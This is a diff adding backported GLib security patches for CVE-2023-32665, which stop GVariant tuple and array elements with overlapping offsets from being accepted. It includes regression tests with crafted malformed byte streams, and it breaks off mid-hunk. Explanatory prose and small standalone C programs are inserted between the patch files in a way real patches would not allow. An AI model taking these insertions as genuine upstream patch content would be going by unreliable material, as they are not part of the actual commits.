+From 7cf6f5b69146d20948d42f0c476688fe17fef787 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 16 Aug 2023 12:09:06 +0000
+Subject: [PATCH] gvariant: Don't allow child elements of a tuple to overlap
+ each other
+
+This is similar to the earlier commit which prevents child elements of a
+variable-sized array from overlapping each other, but this time for
+tuples. It is based heavily on ideas by William Manley.
+
+Tuples are slightly different from variable-sized arrays in that they
+contain a mixture of fixed and variable sized elements. All but one of
+the variable sized elements have an entry in the frame offsets table.
+This means that if we were to just check the ordering of the frame
+offsets table, the variable sized elements could still overlap
+interleaving fixed sized elements, which would be bad.
+
+Therefore we have to check the elements rather than the frame offsets.
+
+The logic of checking the elements up to the index currently being
+requested, and caching the result in `ordered_offsets_up_to`, means that
+the algorithmic cost implications are the same for this commit as for
+variable-sized arrays: an O(N) cost for these checks is amortised out
+over N accesses to O(1) per access.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Fixes: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/7cf6f5b69146d20948d42f0c476688fe17fef787]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-core.c | 6 +-
+ glib/gvariant-serialiser.c | 40 ++++++++
+ glib/gvariant-serialiser.h | 7 +-
+ glib/gvariant.c | 1 +
+ glib/tests/gvariant.c | 181 +++++++++++++++++++++++++++++++++++++
+ 5 files changed, 232 insertions(+), 3 deletions(-)
+
+diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
+index 9b51e15..b951cd9 100644
+--- a/glib/gvariant-core.c
++++ b/glib/gvariant-core.c
+@@ -1,6 +1,7 @@
+ /*
+ * Copyright © 2007, 2008 Ryan Lortie
+ * Copyright © 2010 Codethink Limited
++ * Copyright © 2022 Endless OS Foundation, LLC
+ *
+ * This library is free software; you can redistribute it and/or
+ * modify it under the terms of the GNU Lesser General Public
+@@ -179,7 +180,7 @@ struct _GVariant
+ * offsets themselves.
+ *
+ * This field is only relevant for arrays of non
+- * fixed width types.
++ * fixed width types and for tuples.
+ *
+ * .tree: Only valid when the instance is in tree form.
+ *
+@@ -1117,6 +1118,9 @@ g_variant_get_child_value (GVariant *value,
+ */
+ s_child = g_variant_serialised_get_child (serialised, index_);
+
++ /* Update the cached ordered_offsets_up_to, since @serialised will be thrown away when this function exits */
++ value->contents.serialised.ordered_offsets_up_to = MAX (value->contents.serialised.ordered_offsets_up_to, serialised.ordered_offsets_up_to);
++
+ /* Check whether this would cause nesting too deep. If so, return a fake
+ * child. The only situation we expect this to happen in is with a variant,
+ * as all other deeply-nested types have a static type, and hence should
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index fb75923..cd4a3e6 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -942,6 +942,10 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+ * for the tuple. See the notes in gvarianttypeinfo.h.
+ */
+
++/* Note: This doesn’t guarantee that @out_member_end >= @out_member_start; that
++ * condition may not hold true for invalid serialised variants. The caller is
++ * responsible for checking the returned values and handling invalid ones
++ * appropriately. */
+ static void
+ gvs_tuple_get_member_bounds (GVariantSerialised value,
+ gsize index_,
+@@ -1028,6 +1032,42 @@ gvs_tuple_get_child (GVariantSerialised value,
+ return child;
+ }
+
++ /* If the requested @index_ is beyond the set of indices whose framing offsets
++ * have been checked, check the remaining offsets to see whether they’re
++ * normal (in order, no overlapping tuple elements).
++ *
++ * Unlike the checks in gvs_variable_sized_array_get_child(), we have to check
++ * all the tuple *elements* here, not just all the framing offsets, since
++ * tuples contain a mix of elements which use framing offsets and ones which
++ * don’t. None of them are allowed to overlap. */
++ if (index_ > value.ordered_offsets_up_to)
++ {
++ gsize i, prev_i_end = 0;
++
++ if (value.ordered_offsets_up_to > 0)
++ gvs_tuple_get_member_bounds (value, value.ordered_offsets_up_to - 1, offset_size, NULL, &prev_i_end);
++
++ for (i = value.ordered_offsets_up_to; i <= index_; i++)
++ {
++ gsize i_start, i_end;
++
++ gvs_tuple_get_member_bounds (value, i, offset_size, &i_start, &i_end);
++
++ if (i_start > i_end || i_start < prev_i_end || i_end > value.size)
++ break;
++
++ prev_i_end = i_end;
++ }
++
++ value.ordered_offsets_up_to = i - 1;
++ }
++
++ if (index_ > value.ordered_offsets_up_to)
++ {
++ /* Offsets are invalid somewhere, so return an empty child. */
++ return child;
++ }
++
+ if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_OFFSET)
+ {
+ if (offset_size * (member_info->i + 2) > value.size)
+diff --git a/glib/gvariant-serialiser.h b/glib/gvariant-serialiser.h
+index 99d18ef..144aec8 100644
+--- a/glib/gvariant-serialiser.h
++++ b/glib/gvariant-serialiser.h
+@@ -34,8 +34,11 @@ typedef struct
+ * This guarantees that the bytes of element n don't overlap with any previous
+ * element.
+ *
+- * This is both read and set by g_variant_serialised_get_child for arrays of
+- * non-fixed-width types */
++ * This is both read and set by g_variant_serialised_get_child() for arrays of
++ * non-fixed-width types, and for tuples.
++ *
++ * Even when dealing with tuples, @ordered_offsets_up_to is an element index,
++ * rather than an index into the frame offsets. */
+ gsize ordered_offsets_up_to;
+ } GVariantSerialised;
+
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index d6f68a9..cdb428e 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5945,6 +5945,7 @@ g_variant_byteswap (GVariant *value)
+ serialised.type_info = g_variant_get_type_info (trusted);
+ serialised.size = g_variant_get_size (trusted);
+ serialised.data = g_malloc (serialised.size);
++ serialised.ordered_offsets_up_to = G_MAXSIZE; /* operating on the normal form */
+ g_variant_store (trusted, serialised.data);
+ g_variant_unref (trusted);
+
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 967e9a1..a84b02e 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -1,6 +1,7 @@
+ /*
+ * Copyright © 2010 Codethink Limited
+ * Copyright © 2020 William Manley
++ * Copyright © 2022 Endless OS Foundation, LLC
+ *
+ * This library is free software; you can redistribute it and/or
+ * modify it under the terms of the GNU Lesser General Public
+@@ -1451,6 +1452,7 @@ test_maybe (void)
+ serialised.data = flavoured_malloc (needed_size, flavour);
+ serialised.size = needed_size;
+ serialised.depth = 0;
++ serialised.ordered_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised,
+ random_instance_filler,
+@@ -1574,6 +1576,7 @@ test_array (void)
+ serialised.data = flavoured_malloc (needed_size, flavour);
+ serialised.size = needed_size;
+ serialised.depth = 0;
++ serialised.ordered_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised, random_instance_filler,
+ (gpointer *) instances, n_children);
+@@ -1738,6 +1741,7 @@ test_tuple (void)
+ serialised.data = flavoured_malloc (needed_size, flavour);
+ serialised.size = needed_size;
+ serialised.depth = 0;
++ serialised.ordered_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised, random_instance_filler,
+ (gpointer *) instances, n_children);
+@@ -1834,6 +1838,7 @@ test_variant (void)
+ serialised.data = flavoured_malloc (needed_size, flavour);
+ serialised.size = needed_size;
+ serialised.depth = 0;
++ serialised.ordered_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised, random_instance_filler,
+ (gpointer *) &instance, 1);
+@@ -5106,6 +5111,176 @@ test_normal_checking_tuple_offsets (void)
+ g_variant_unref (variant);
+ }
+
++/* This is a regression test that we can't have non-normal values that take up
++ * significantly more space than the normal equivalent, by specifying the
++ * offset table entries so that tuple elements overlap.
++ *
++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_838503 and
++ * https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_838513 */
++static void
++test_normal_checking_tuple_offsets2 (void)
++{
++ const GVariantType *data_type = G_VARIANT_TYPE ("(yyaiyyaiyy)");
++ const guint8 data[] = {
++ 0x12, 0x34, 0x56, 0x78, 0x01,
++ /*
++ ^───────────────────┘
++
++ ^^^^^^^^^^ 1st yy
++ ^^^^^^^^^^ 2nd yy
++ ^^^^^^^^^^ 3rd yy
++ ^^^^ Framing offsets
++ */
++
++ /* If this variant was encoded normally, it would be something like this:
++ * 0x12, 0x34, pad, pad, [array bytes], 0x56, 0x78, pad, pad, [array bytes], 0x9A, 0xBC, 0xXX
++ * ^─────────────────────────────────────────────────────┘
++ *
++ * ^^^^^^^^^^ 1st yy
++ * ^^^^^^^^^^ 2nd yy
++ * ^^^^^^^^^^ 3rd yy
++ * ^^^^ Framing offsets
++ */
++ };
++ gsize size = sizeof (data);
++ GVariant *variant = NULL;
++ GVariant *normal_variant = NULL;
++ GVariant *expected = NULL;
++
++ variant = g_variant_new_from_data (data_type, data, size, FALSE, NULL, NULL);
++ g_assert_nonnull (variant);
++
++ normal_variant = g_variant_get_normal_form (variant);
++ g_assert_nonnull (normal_variant);
++ g_assert_cmpuint (g_variant_get_size (normal_variant), <=, size * 3);
++
++ expected = g_variant_new_parsed (
++ "@(yyaiyyaiyy) (0x12, 0x34, [], 0x00, 0x00, [], 0x00, 0x00)");
++ g_assert_cmpvariant (expected, variant);
++ g_assert_cmpvariant (expected, normal_variant);
++
++ g_variant_unref (expected);
++ g_variant_unref (normal_variant);
++ g_variant_unref (variant);
++}
++
++/* This is a regression test that overlapping entries in the offset table are
++ * decoded consistently, even though they’re non-normal.
++ *
++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_910935 */
++static void
++test_normal_checking_tuple_offsets3 (void)
++{
++ /* The expected decoding of this non-normal byte stream is complex. See
++ * section 2.7.3 (Handling Non-Normal Serialised Data) of the GVariant
++ * specification.
++ *
++ * The rule “Child Values Overlapping Framing Offsets” from the specification
++ * says that the first `ay` must be decoded as `[0x01]` even though it
++ * overlaps the first byte of the offset table. However, since commit
++ * 7eedcd76f7d5b8c98fa60013e1fe6e960bf19df3, GLib explicitly doesn’t allow
++ * this as it’s exploitable. So the first `ay` must be given a default value.
++ *
++ * The second and third `ay`s must be given default values because of rule
++ * “End Boundary Precedes Start Boundary”.
++ *
++ * The `i` must be given a default value because of rule “Start or End
++ * Boundary of a Child Falls Outside the Container”.
++ */
++ const GVariantType *data_type = G_VARIANT_TYPE ("(ayayiay)");
++ const guint8 data[] = {
++ 0x01, 0x00, 0x02,
++ /*
++ ^──┘
++
++ ^^^^^^^^^^ 1st ay, bytes 0-2 (but given a default value anyway, see above)
++ 2nd ay, bytes 2-0
++ i, bytes 0-4
++ 3rd ay, bytes 4-1
++ ^^^^^^^^^^ Framing offsets
++ */
++ };
++ gsize size = sizeof (data);
++ GVariant *variant = NULL;
++ GVariant *normal_variant = NULL;
++ GVariant *expected = NULL;
++
++ variant = g_variant_new_from_data (data_type, data, size, FALSE, NULL, NULL);
++ g_assert_nonnull (variant);
++
++ g_assert_false (g_variant_is_normal_form (variant));
++
++ normal_variant = g_variant_get_normal_form (variant);
++ g_assert_nonnull (normal_variant);
++ g_assert_cmpuint (g_variant_get_size (normal_variant), <=, size * 3);
++
++ expected = g_variant_new_parsed ("@(ayayiay) ([], [], 0, [])");
++ g_assert_cmpvariant (expected, variant);
++ g_assert_cmpvariant (expected, normal_variant);
++
++ g_variant_unref (expected);
++ g_variant_unref (normal_variant);
++ g_variant_unref (variant);
++}
++
++/* This is a regression test that overlapping entries in the offset table are
++ * decoded consistently, even though they’re non-normal.
++ *
++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_910935 */
++static void
++test_normal_checking_tuple_offsets4 (void)
++{
++ /* The expected decoding of this non-normal byte stream is complex. See
++ * section 2.7.3 (Handling Non-Normal Serialised Data) of the GVariant
++ * specification.
++ *
++ * The rule “Child Values Overlapping Framing Offsets” from the specification
++ * says that the first `ay` must be decoded as `[0x01]` even though it
++ * overlaps the first byte of the offset table. However, since commit
++ * 7eedcd76f7d5b8c98fa60013e1fe6e960bf19df3, GLib explicitly doesn’t allow
++ * this as it’s exploitable. So the first `ay` must be given a default value.
++ *
++ * The second `ay` must be given a default value because of rule “End Boundary
++ * Precedes Start Boundary”.
++ *
++ * The third `ay` must be given a default value because its framing offsets
++ * overlap that of the first `ay`.
++ */
++ const GVariantType *data_type = G_VARIANT_TYPE ("(ayayay)");
++ const guint8 data[] = {
++ 0x01, 0x00, 0x02,
++ /*
++ ^──┘
++
++ ^^^^^^^^^^ 1st ay, bytes 0-2 (but given a default value anyway, see above)
++ 2nd ay, bytes 2-0
++ 3rd ay, bytes 0-1
++ ^^^^^^^^^^ Framing offsets
++ */
++ };
++ gsize size = sizeof (data);
++ GVariant *variant = NULL;
++ GVariant *normal_variant = NULL;
++ GVariant *expected = NULL;
++
++ variant = g_variant_new_from_data (data_type, data, size, FALSE, NULL, NULL);
++ g_assert_nonnull (variant);
++
++ g_assert_false (g_variant_is_normal_form (variant));
++
++ normal_variant = g_variant_get_normal_form (variant);
++ g_assert_nonnull (normal_variant);
++ g_assert_cmpuint (g_variant_get_size (normal_variant), <=, size * 3);
++
++ expected = g_variant_new_parsed ("@(ayayay) ([], [], [])");
++ g_assert_cmpvariant (expected, variant);
++ g_assert_cmpvariant (expected, normal_variant);
++
++ g_variant_unref (expected);
++ g_variant_unref (normal_variant);
++ g_variant_unref (variant);
++}
++
+ /* Test that an empty object path is normalised successfully to the base object
+ * path, ‘/’. */
+ static void
+@@ -5253,6 +5428,12 @@ main (int argc, char **argv)
+ test_normal_checking_array_offsets2);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets",
+ test_normal_checking_tuple_offsets);
++ g_test_add_func ("/gvariant/normal-checking/tuple-offsets2",
++ test_normal_checking_tuple_offsets2);
++ g_test_add_func ("/gvariant/normal-checking/tuple-offsets3",
++ test_normal_checking_tuple_offsets3);
++ g_test_add_func ("/gvariant/normal-checking/tuple-offsets4",
++ test_normal_checking_tuple_offsets4);
+ g_test_add_func ("/gvariant/normal-checking/empty-object-path",
+ test_normal_checking_empty_object_path);
+
+--
+2.24.4
+
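The new tests above exercise the fix through the public API. For reference, a minimal standalone program in the same vein (built against a GLib with this series applied, using the usual pkg-config glib-2.0 flags) feeds the same five non-normal bytes to g_variant_new_from_data() and asks for the normal form; with the overlap checks in place, tuple members whose offsets overlap or fall out of range come back as default values rather than aliasing each other.

    #include <glib.h>

    int
    main (void)
    {
      /* Same non-normal byte stream as the tuple-offsets2 test above. */
      const guint8 data[] = { 0x12, 0x34, 0x56, 0x78, 0x01 };
      GVariant *untrusted, *normal;
      gchar *printed;

      /* trusted = FALSE: the serialiser must treat the offsets as suspect. */
      untrusted = g_variant_new_from_data (G_VARIANT_TYPE ("(yyaiyyaiyy)"),
                                           data, sizeof (data),
                                           FALSE, NULL, NULL);

      /* Members with overlapping or out-of-range offsets are decoded as
       * default values instead of aliasing other members' bytes. */
      normal = g_variant_get_normal_form (untrusted);
      printed = g_variant_print (normal, TRUE);
      g_print ("%s\n", printed);

      g_free (printed);
      g_variant_unref (normal);
      g_variant_unref (untrusted);
      return 0;
    }

As in the tests, g_variant_new_from_data() returns a floating reference, which g_variant_unref() releases directly.
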
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0007.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0007.patch
new file mode 100644
index 0000000000..83d0205160
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0007.patch
@@ -0,0 +1,49 @@
+From e6490c84e84ba9f182fbd83b51ff4f9f5a0a1793 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 16 Aug 2023 03:42:47 +0000
+Subject: [PATCH] gvariant: Port g_variant_deep_copy() to count its iterations
+ directly
+
+This is equivalent to what `GVariantIter` does, but it means that
+`g_variant_deep_copy()` is making its own `g_variant_get_child_value()`
+calls.
+
+This will be useful in an upcoming commit, where those child values will
+be inspected a little more deeply.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/e6490c84e84ba9f182fbd83b51ff4f9f5a0a1793]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant.c | 7 +++----
+ 1 file changed, 3 insertions(+), 4 deletions(-)
+
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index cdb428e..fdd36be 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5799,14 +5799,13 @@ g_variant_deep_copy (GVariant *value)
+ case G_VARIANT_CLASS_VARIANT:
+ {
+ GVariantBuilder builder;
+- GVariantIter iter;
+- GVariant *child;
++ gsize i, n_children;
+
+ g_variant_builder_init (&builder, g_variant_get_type (value));
+- g_variant_iter_init (&iter, value);
+
+- while ((child = g_variant_iter_next_value (&iter)))
++ for (i = 0, n_children = g_variant_n_children (value); i < n_children; i++)
+ {
++ GVariant *child = g_variant_get_child_value (value, i);
+ g_variant_builder_add_value (&builder, g_variant_deep_copy (child));
+ g_variant_unref (child);
+ }
+--
+2.24.4
+
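The rework above swaps GVariantIter for an explicit index loop so that g_variant_deep_copy() makes its own g_variant_get_child_value() calls. The same index-based walk is available through the public API; the short sketch below (a hypothetical helper, not GLib code) counts the leaf values of an arbitrary GVariant that way.

    #include <glib.h>

    /* Recursively count non-container values, walking children by index
     * in the same style as the reworked g_variant_deep_copy(). */
    static gsize
    count_leaves (GVariant *value)
    {
      gsize i, n, total = 0;

      if (!g_variant_is_container (value))
        return 1;

      n = g_variant_n_children (value);
      for (i = 0; i < n; i++)
        {
          GVariant *child = g_variant_get_child_value (value, i);

          total += count_leaves (child);
          g_variant_unref (child);
        }

      return total;
    }

    int
    main (void)
    {
      /* Floating reference; unreffed directly below. */
      GVariant *v = g_variant_new_parsed ("([1, 2, 3], 'hi', (4, 5))");

      g_print ("%" G_GSIZE_FORMAT " leaf values\n", count_leaves (v));
      g_variant_unref (v);
      return 0;
    }
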
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0008.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0008.patch
new file mode 100644
index 0000000000..f098548618
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0008.patch
@@ -0,0 +1,394 @@
+From d1a293c4e29880b8d17bb826c9a426a440ca4a91 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 17 Aug 2023 01:30:38 +0000
+Subject: [PATCH] gvariant: Track checked and ordered offsets independently
+
+The past few commits introduced the concept of known-good offsets in the
+offset table (which is used for variable-width arrays and tuples).
+Good offsets are ones which are non-overlapping with all the previous
+offsets in the table.
+
+If a bad offset is encountered when indexing into the array or tuple,
+the cached known-good offset index will not be increased. In this way,
+all child variants at and beyond the first bad offset can be returned as
+default values rather than dereferencing potentially invalid data.
+
+In this case, there was no information about the fact that the indexes
+between the highest known-good index and the requested one had been
+checked already. That could lead to a pathological case where an offset
+table with an invalid first offset is repeatedly checked in full when
+trying to access higher-indexed children.
+
+Avoid that by storing the index of the highest checked offset in the
+table, as well as the index of the highest good/ordered offset.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/d1a293c4e29880b8d17bb826c9a426a440ca4a91]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-core.c | 28 ++++++++++++++++++++++++
+ glib/gvariant-serialiser.c | 44 +++++++++++++++++++++++++++-----------
+ glib/gvariant-serialiser.h | 9 ++++++++
+ glib/gvariant.c | 1 +
+ glib/tests/gvariant.c | 5 +++++
+ 5 files changed, 75 insertions(+), 12 deletions(-)
+
+diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
+index b951cd9..1b9d5cc 100644
+--- a/glib/gvariant-core.c
++++ b/glib/gvariant-core.c
+@@ -67,6 +67,7 @@ struct _GVariant
+ GBytes *bytes;
+ gconstpointer data;
+ gsize ordered_offsets_up_to;
++ gsize checked_offsets_up_to;
+ } serialised;
+
+ struct
+@@ -182,6 +183,24 @@ struct _GVariant
+ * This field is only relevant for arrays of non
+ * fixed width types and for tuples.
+ *
++ * .checked_offsets_up_to: Similarly to .ordered_offsets_up_to, this stores
++ * the index of the highest element, n, whose frame
++ * offsets (and all the preceding frame offsets)
++ * have been checked for validity.
++ *
++ * It is always the case that
++ * .checked_offsets_up_to ≥ .ordered_offsets_up_to.
++ *
++ * If .checked_offsets_up_to == .ordered_offsets_up_to,
++ * then a bad offset has not been found so far.
++ *
++ * If .checked_offsets_up_to > .ordered_offsets_up_to,
++ * then a bad offset has been found at
++ * (.ordered_offsets_up_to + 1).
++ *
++ * This field is only relevant for arrays of non
++ * fixed width types and for tuples.
++ *
+ * .tree: Only valid when the instance is in tree form.
+ *
+ * Note that accesses from other threads could result in
+@@ -386,6 +405,7 @@ g_variant_to_serialised (GVariant *value)
+ value->size,
+ value->depth,
+ value->contents.serialised.ordered_offsets_up_to,
++ value->contents.serialised.checked_offsets_up_to,
+ };
+ return serialised;
+ }
+@@ -418,6 +438,7 @@ g_variant_serialise (GVariant *value,
+ serialised.data = data;
+ serialised.depth = value->depth;
+ serialised.ordered_offsets_up_to = 0;
++ serialised.checked_offsets_up_to = 0;
+
+ children = (gpointer *) value->contents.tree.children;
+ n_children = value->contents.tree.n_children;
+@@ -464,10 +485,12 @@ g_variant_fill_gvs (GVariantSerialised *serialised,
+ if (value->state & STATE_SERIALISED)
+ {
+ serialised->ordered_offsets_up_to = value->contents.serialised.ordered_offsets_up_to;
++ serialised->checked_offsets_up_to = value->contents.serialised.checked_offsets_up_to;
+ }
+ else
+ {
+ serialised->ordered_offsets_up_to = 0;
++ serialised->checked_offsets_up_to = 0;
+ }
+
+ if (serialised->data)
+@@ -513,6 +536,7 @@ g_variant_ensure_serialised (GVariant *value)
+ value->contents.serialised.data = g_bytes_get_data (bytes, NULL);
+ value->contents.serialised.bytes = bytes;
+ value->contents.serialised.ordered_offsets_up_to = G_MAXSIZE;
++ value->contents.serialised.checked_offsets_up_to = G_MAXSIZE;
+ value->state |= STATE_SERIALISED;
+ }
+ }
+@@ -594,6 +618,7 @@ g_variant_new_from_bytes (const GVariantType *type,
+ serialised.data = (guchar *) g_bytes_get_data (bytes, &serialised.size);
+ serialised.depth = 0;
+ serialised.ordered_offsets_up_to = trusted ? G_MAXSIZE : 0;
++ serialised.checked_offsets_up_to = trusted ? G_MAXSIZE : 0;
+
+ if (!g_variant_serialised_check (serialised))
+ {
+@@ -644,6 +669,7 @@ g_variant_new_from_bytes (const GVariantType *type,
+ }
+
+ value->contents.serialised.ordered_offsets_up_to = trusted ? G_MAXSIZE : 0;
++ value->contents.serialised.checked_offsets_up_to = trusted ? G_MAXSIZE : 0;
+
+ g_clear_pointer (&owned_bytes, g_bytes_unref);
+
+@@ -1120,6 +1146,7 @@ g_variant_get_child_value (GVariant *value,
+
+ /* Update the cached ordered_offsets_up_to, since @serialised will be thrown away when this function exits */
+ value->contents.serialised.ordered_offsets_up_to = MAX (value->contents.serialised.ordered_offsets_up_to, serialised.ordered_offsets_up_to);
++ value->contents.serialised.checked_offsets_up_to = MAX (value->contents.serialised.checked_offsets_up_to, serialised.checked_offsets_up_to);
+
+ /* Check whether this would cause nesting too deep. If so, return a fake
+ * child. The only situation we expect this to happen in is with a variant,
+@@ -1147,6 +1174,7 @@ g_variant_get_child_value (GVariant *value,
+ g_bytes_ref (value->contents.serialised.bytes);
+ child->contents.serialised.data = s_child.data;
+ child->contents.serialised.ordered_offsets_up_to = s_child.ordered_offsets_up_to;
++ child->contents.serialised.checked_offsets_up_to = s_child.checked_offsets_up_to;
+
+ return child;
+ }
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index cd4a3e6..0bf7243 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -120,6 +120,8 @@
+ *
+ * @depth has no restrictions; the depth of a top-level serialised #GVariant is
+ * zero, and it increases for each level of nested child.
++ *
++ * @checked_offsets_up_to is always ≥ @ordered_offsets_up_to
+ */
+
+ /* < private >
+@@ -147,6 +149,9 @@ g_variant_serialised_check (GVariantSerialised serialised)
+ !(serialised.size == 0 || serialised.data != NULL))
+ return FALSE;
+
++ if (serialised.ordered_offsets_up_to > serialised.checked_offsets_up_to)
++ return FALSE;
++
+ /* Depending on the native alignment requirements of the machine, the
+ * compiler will insert either 3 or 7 padding bytes after the char.
+ * This will result in the sizeof() the struct being 12 or 16.
+@@ -266,6 +271,7 @@ gvs_fixed_sized_maybe_get_child (GVariantSerialised value,
+ g_variant_type_info_ref (value.type_info);
+ value.depth++;
+ value.ordered_offsets_up_to = 0;
++ value.checked_offsets_up_to = 0;
+
+ return value;
+ }
+@@ -297,7 +303,7 @@ gvs_fixed_sized_maybe_serialise (GVariantSerialised value,
+ {
+ if (n_children)
+ {
+- GVariantSerialised child = { NULL, value.data, value.size, value.depth + 1, 0 };
++ GVariantSerialised child = { NULL, value.data, value.size, value.depth + 1, 0, 0 };
+
+ gvs_filler (&child, children[0]);
+ }
+@@ -320,6 +326,7 @@ gvs_fixed_sized_maybe_is_normal (GVariantSerialised value)
+ value.type_info = g_variant_type_info_element (value.type_info);
+ value.depth++;
+ value.ordered_offsets_up_to = 0;
++ value.checked_offsets_up_to = 0;
+
+ return g_variant_serialised_is_normal (value);
+ }
+@@ -362,6 +369,7 @@ gvs_variable_sized_maybe_get_child (GVariantSerialised value,
+
+ value.depth++;
+ value.ordered_offsets_up_to = 0;
++ value.checked_offsets_up_to = 0;
+
+ return value;
+ }
+@@ -392,7 +400,7 @@ gvs_variable_sized_maybe_serialise (GVariantSerialised value,
+ {
+ if (n_children)
+ {
+- GVariantSerialised child = { NULL, value.data, value.size - 1, value.depth + 1, 0 };
++ GVariantSerialised child = { NULL, value.data, value.size - 1, value.depth + 1, 0, 0 };
+
+ /* write the data for the child. */
+ gvs_filler (&child, children[0]);
+@@ -413,6 +421,7 @@ gvs_variable_sized_maybe_is_normal (GVariantSerialised value)
+ value.size--;
+ value.depth++;
+ value.ordered_offsets_up_to = 0;
++ value.checked_offsets_up_to = 0;
+
+ return g_variant_serialised_is_normal (value);
+ }
+@@ -739,39 +748,46 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
+
+ /* If the requested @index_ is beyond the set of indices whose framing offsets
+ * have been checked, check the remaining offsets to see whether they’re
+- * normal (in order, no overlapping array elements). */
+- if (index_ > value.ordered_offsets_up_to)
++ * normal (in order, no overlapping array elements).
++ *
++ * Don’t bother checking if the highest known-good offset is lower than the
++ * highest checked offset, as that means there’s an invalid element at that
++ * index, so there’s no need to check further. */
++ if (index_ > value.checked_offsets_up_to &&
++ value.ordered_offsets_up_to == value.checked_offsets_up_to)
+ {
+ switch (offsets.offset_size)
+ {
+ case 1:
+ {
+ value.ordered_offsets_up_to = find_unordered_guint8 (
+- offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ offsets.array, value.checked_offsets_up_to, index_ + 1);
+ break;
+ }
+ case 2:
+ {
+ value.ordered_offsets_up_to = find_unordered_guint16 (
+- offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ offsets.array, value.checked_offsets_up_to, index_ + 1);
+ break;
+ }
+ case 4:
+ {
+ value.ordered_offsets_up_to = find_unordered_guint32 (
+- offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ offsets.array, value.checked_offsets_up_to, index_ + 1);
+ break;
+ }
+ case 8:
+ {
+ value.ordered_offsets_up_to = find_unordered_guint64 (
+- offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ offsets.array, value.checked_offsets_up_to, index_ + 1);
+ break;
+ }
+ default:
+ /* gvs_get_offset_size() only returns maximum 8 */
+ g_assert_not_reached ();
+ }
++
++ value.checked_offsets_up_to = index_;
+ }
+
+ if (index_ > value.ordered_offsets_up_to)
+@@ -916,6 +932,7 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+
+ /* All offsets have now been checked. */
+ value.ordered_offsets_up_to = G_MAXSIZE;
++ value.checked_offsets_up_to = G_MAXSIZE;
+
+ return TRUE;
+ }
+@@ -1040,14 +1057,15 @@ gvs_tuple_get_child (GVariantSerialised value,
+ * all the tuple *elements* here, not just all the framing offsets, since
+ * tuples contain a mix of elements which use framing offsets and ones which
+ * don’t. None of them are allowed to overlap. */
+- if (index_ > value.ordered_offsets_up_to)
++ if (index_ > value.checked_offsets_up_to &&
++ value.ordered_offsets_up_to == value.checked_offsets_up_to)
+ {
+ gsize i, prev_i_end = 0;
+
+- if (value.ordered_offsets_up_to > 0)
+- gvs_tuple_get_member_bounds (value, value.ordered_offsets_up_to - 1, offset_size, NULL, &prev_i_end);
++ if (value.checked_offsets_up_to > 0)
++ gvs_tuple_get_member_bounds (value, value.checked_offsets_up_to - 1, offset_size, NULL, &prev_i_end);
+
+- for (i = value.ordered_offsets_up_to; i <= index_; i++)
++ for (i = value.checked_offsets_up_to; i <= index_; i++)
+ {
+ gsize i_start, i_end;
+
+@@ -1060,6 +1078,7 @@ gvs_tuple_get_child (GVariantSerialised value,
+ }
+
+ value.ordered_offsets_up_to = i - 1;
++ value.checked_offsets_up_to = index_;
+ }
+
+ if (index_ > value.ordered_offsets_up_to)
+@@ -1257,6 +1276,7 @@ gvs_tuple_is_normal (GVariantSerialised value)
+
+ /* All element bounds have been checked above. */
+ value.ordered_offsets_up_to = G_MAXSIZE;
